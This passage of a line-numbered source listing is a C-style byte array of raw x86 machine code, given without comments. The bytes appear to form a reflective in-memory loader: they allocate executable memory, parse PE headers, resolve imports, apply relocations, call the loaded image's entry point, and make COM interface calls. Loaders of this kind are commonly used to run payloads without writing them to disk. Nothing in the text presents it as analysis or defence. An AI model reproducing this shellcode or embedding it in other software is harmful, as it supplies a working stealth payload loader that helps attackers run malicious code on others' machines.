325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
476 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05,
477 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83,
478 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24,
479 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b,
480 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75,
481 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b,
482 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c,
483 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01,
484 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66,
485 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00,
486 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c,
487 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b,
488 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
489 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43,
490 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83,
491 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18,
492 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04,
493 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00,
494 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b,
495 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b,
496 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31,
497 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
498 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b,
499 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59,
500 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89,
501 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00,
502 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20,
503 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81,
504 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00,
505 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50,
506 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00,
507 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00,
508 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08,
509 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00,
510 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4,
511 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb,
512 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03,
513 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0,
514 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40,
515 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81,
516 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00,
517 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d,
518 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40,
519 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00,
520 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c,
521 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e,
522 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e,
523 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44,
524 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53,
525 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24,
526 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff,
527 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8,
528 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d,
529 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a,
530 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac,
531 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b,
532 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04,
533 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77,
534 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0,
535 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c,
536 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75,
537 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b,
538 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff,
539 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6,
540 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57,
541 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75,
542 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51,
543 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b,
544 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24,
545 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00,
546 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8,
547 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00,
548 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8,
549 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74,
550 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe,
551 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07,
552 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d,
553 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b,
